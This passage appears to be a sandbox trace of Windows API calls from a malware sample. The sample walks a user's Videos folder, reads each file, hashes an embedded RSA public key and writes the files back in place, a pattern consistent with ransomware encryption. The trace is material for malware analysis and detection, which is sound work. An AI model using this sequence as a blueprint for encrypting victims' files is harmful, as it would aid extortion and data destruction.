"c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\ippawk.flv.vvyu")) returned 1 [0195.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.894] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0195.907] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9793fbc0, ftCreationTime.dwHighDateTime=0x1d89cd3, ftLastAccessTime.dwLowDateTime=0x3e871cc0, ftLastAccessTime.dwHighDateTime=0x1d8a321, ftLastWriteTime.dwLowDateTime=0x3e871cc0, ftLastWriteTime.dwHighDateTime=0x1d8a321, nFileSizeHigh=0x0, nFileSizeLow=0x16217, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ixnsaF850.swf", cAlternateFileName="IXNSAF~1.SWF")) returned 1 [0195.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0195.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.910] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\ixnsaF850.swf") returned=".swf" [0195.910] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\ixnsaF850.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\ixnsaf850.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0195.911] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=90647) returned 1 [0195.911] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0195.914] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x161f1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.914] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.917] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.917] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x16217, lpOverlapped=0x0) returned 1 [0195.918] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0195.918] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.918] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.918] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0195.919] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0195.919] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.919] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0195.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0195.919] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0195.919] GetLastError () returned 0x0 [0195.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.919] GetLastError () returned 0x0 [0195.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.920] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0195.920] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0195.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.920] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0195.920] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0195.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.920] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0195.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16220) returned 0x2af5168 [0195.921] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0195.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0195.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0195.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae9fd8 [0195.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64d0 [0195.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea020 [0195.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64e8 [0195.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6518 [0195.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6578 [0195.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6530 [0195.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0195.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0195.922] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0195.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0195.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6518 | out: hHeap=0x2c0000) returned 1 [0195.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6530 | out: hHeap=0x2c0000) returned 1 [0195.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6578 | out: hHeap=0x2c0000) returned 1 [0195.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0195.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0195.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6578 [0195.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0195.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6530 [0195.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0195.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6518 [0195.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0195.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0195.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0195.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0195.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0195.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0195.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0195.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6530 | out: hHeap=0x2c0000) returned 1 [0195.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6518 | out: hHeap=0x2c0000) returned 1 [0195.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6578 | out: hHeap=0x2c0000) returned 1 [0195.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0195.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0195.925] GetCurrentThreadId () returned 0x5d8 [0195.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0195.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae8808 [0195.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0195.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0195.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0195.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0195.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.927] GetCurrentThreadId () returned 0x5d8 [0195.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0195.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0195.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0195.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0195.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0195.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6578 [0195.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0195.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0195.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0195.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0195.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6518 [0195.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0195.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0195.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0195.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0195.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6530 [0195.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0195.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0195.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0195.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6500 [0195.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0195.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6590 [0195.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0195.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6560 [0195.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6548 [0195.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65a8 [0195.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6548 | out: hHeap=0x2c0000) returned 1 [0195.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6548 [0195.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6560 | out: hHeap=0x2c0000) returned 1 [0195.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0195.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0195.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0195.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6518 | out: hHeap=0x2c0000) returned 1 [0195.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6518 [0195.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0195.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6578 | out: hHeap=0x2c0000) returned 1 [0195.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0195.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65a8 | out: hHeap=0x2c0000) returned 1 [0195.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0195.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0195.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0195.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6518 | out: hHeap=0x2c0000) returned 1 [0195.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0195.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0195.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0195.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0195.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0195.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0195.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0195.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0195.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0195.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6548 | out: hHeap=0x2c0000) returned 1 [0195.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6590 | out: hHeap=0x2c0000) returned 1 [0195.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6530 | out: hHeap=0x2c0000) returned 1 [0195.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6500 | out: hHeap=0x2c0000) returned 1 [0195.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0195.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0195.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0195.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64e8 | out: hHeap=0x2c0000) returned 1 [0195.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea020 | out: hHeap=0x2c0000) returned 1 [0195.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0195.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0195.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0195.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.939] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x16212, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x16212, lpOverlapped=0x0) returned 1 [0195.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0195.941] SetFilePointerEx (in: 